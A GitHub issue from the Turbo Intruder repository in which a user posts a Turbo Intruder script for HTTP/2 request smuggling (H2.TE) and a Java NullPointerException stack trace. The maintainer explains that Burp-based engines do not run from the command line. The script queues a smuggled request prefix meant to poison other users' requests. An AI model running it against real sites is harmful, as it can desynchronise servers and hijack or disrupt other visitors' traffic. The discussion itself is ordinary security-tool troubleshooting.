search

PortSwigger / turbo-intruder

Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
https://portswigger.net/blog/turbo-intruder-embracing-the-billion-request-attack
Apache License 2.0
1.42k stars 207 forks source link

Turbo Intruder cli http2 hrs not worked #119

Closed hostfree23434 closed 1 year ago

hostfree23434 commented 1 year ago

Hi, I use this script for h2.te smuggling:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           engine=Engine.BURP2,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /robots.txt HTTP/1.1
X-Ignore: X'''

    # HTTP uses \r\n for line-endings. Linux uses \n so we need to normalise
    if '\r' not in prefix:
        prefix = prefix.replace('\n', '\r\n')

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    victim = target.req

    while True:

        engine.queue(attack)
        for i in range(4):
            engine.queue(victim)
            time.sleep(0.05)
        time.sleep(1)

def handleResponse(req, interesting):
    table.add(req)

And i get this error:

requestsPerConnection has been forced to 1 and pipelining has been disabled due to Burp engine limitations
There was an error executing your Python script. This is probably due to a flaw in your script, rather than a bug in Turbo Intruder :)
If you think it is a Turbo Intruder issue, try out this script: https://raw.githubusercontent.com/PortSwigger/turbo-intruder/master/resources/examples/debug.py
For your convenience, here's the full stack trace:
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 2, in queueRequests
  File "<string>", line 289, in __init__
        at burp.BurpRequestEngine.<init>(BurpRequestEngine.kt:27)
        at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
        at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
        at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
        at org.python.core.PyReflectedConstructor.constructProxy(PyReflectedConstructor.java:211)

java.lang.NullPointerException: java.lang.NullPointerException

        at org.python.core.Py.JavaError(Py.java:546)
        at org.python.core.Py.JavaError(Py.java:537)
        at org.python.core.PyReflectedConstructor.constructProxy(PyReflectedConstructor.java:221)
        at org.python.core.PyReflectedConstructor.__call__(PyReflectedConstructor.java:180)
        at org.python.core.PyObject.__call__(PyObject.java:419)
        at org.python.core.PyMethod.instancemethod___call__(PyMethod.java:237)
        at org.python.core.PyMethod.__call__(PyMethod.java:228)
        at org.python.core.PyMethod.__call__(PyMethod.java:223)
        at org.python.core.Deriveds.dispatch__init__(Deriveds.java:19)
        at org.python.core.PyObjectDerived.dispatch__init__(PyObjectDerived.java:1112)
        at org.python.core.PyType.type___call__(PyType.java:1713)
        at org.python.core.PyType.__call__(PyType.java:1696)
        at org.python.core.PyObject.__call__(PyObject.java:431)
        at org.python.core.PyObject.__call__(PyObject.java:435)
        at org.python.pycode._pyx0.__init__$66(<string>:303)
        at org.python.pycode._pyx0.call_function(<string>)
        at org.python.core.PyTableCode.call(PyTableCode.java:167)
        at org.python.core.PyBaseCode.call(PyBaseCode.java:307)
        at org.python.core.PyBaseCode.call(PyBaseCode.java:198)
        at org.python.core.PyFunction.__call__(PyFunction.java:482)
        at org.python.core.PyFunction.__call__(PyFunction.java:476)
        at org.python.core.PyInstance.__init__(PyInstance.java:124)
        at org.python.core.PyClass.__call__(PyClass.java:193)
        at org.python.core.PyObject.__call__(PyObject.java:394)
        at org.python.pycode._pyx1.queueRequests$1(<string>:21)
        at org.python.pycode._pyx1.call_function(<string>)
        at org.python.core.PyTableCode.call(PyTableCode.java:167)
        at org.python.core.PyBaseCode.call(PyBaseCode.java:153)
        at org.python.core.PyFunction.__call__(PyFunction.java:423)
        at org.python.pycode._pyx2.f$0(<string>:1)
        at org.python.pycode._pyx2.call_function(<string>)
        at org.python.core.PyTableCode.call(PyTableCode.java:167)
        at org.python.core.PyCode.call(PyCode.java:18)
        at org.python.core.Py.runCode(Py.java:1386)
        at org.python.core.Py.exec(Py.java:1430)
        at org.python.util.PythonInterpreter.exec(PythonInterpreter.java:267)
        at burp.Fast_httpKt.evalJython(fast-http.kt:56)
        at burp.Fast_httpKt.main(fast-http.kt:438)
Caused by: java.lang.NullPointerException
        at burp.BurpRequestEngine.<init>(BurpRequestEngine.kt:27)
        at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
        at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
        at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
        at org.python.core.PyReflectedConstructor.constructProxy(PyReflectedConstructor.java:211)
        ... 35 more

User Python error, check extender for full details: Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 2, in queueRequests
  File "<string>", line 289, in __init__
        at burp.BurpRequestEngine.<init>(BurpRequestEngine.kt:27)
        at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
        at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
        at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
        at org.python.core.PyReflectedConstructor.constructProxy(PyReflectedConstructor.java:211)

java.lang.NullPointerException: java.lang.NullPointerException

Regards.

albinowax commented 1 year ago

Engines with 'BURP' in the name won't work from the command line, as they rely on Burp Suite. Try Engine.HTTP2 (note, it's not super reliable)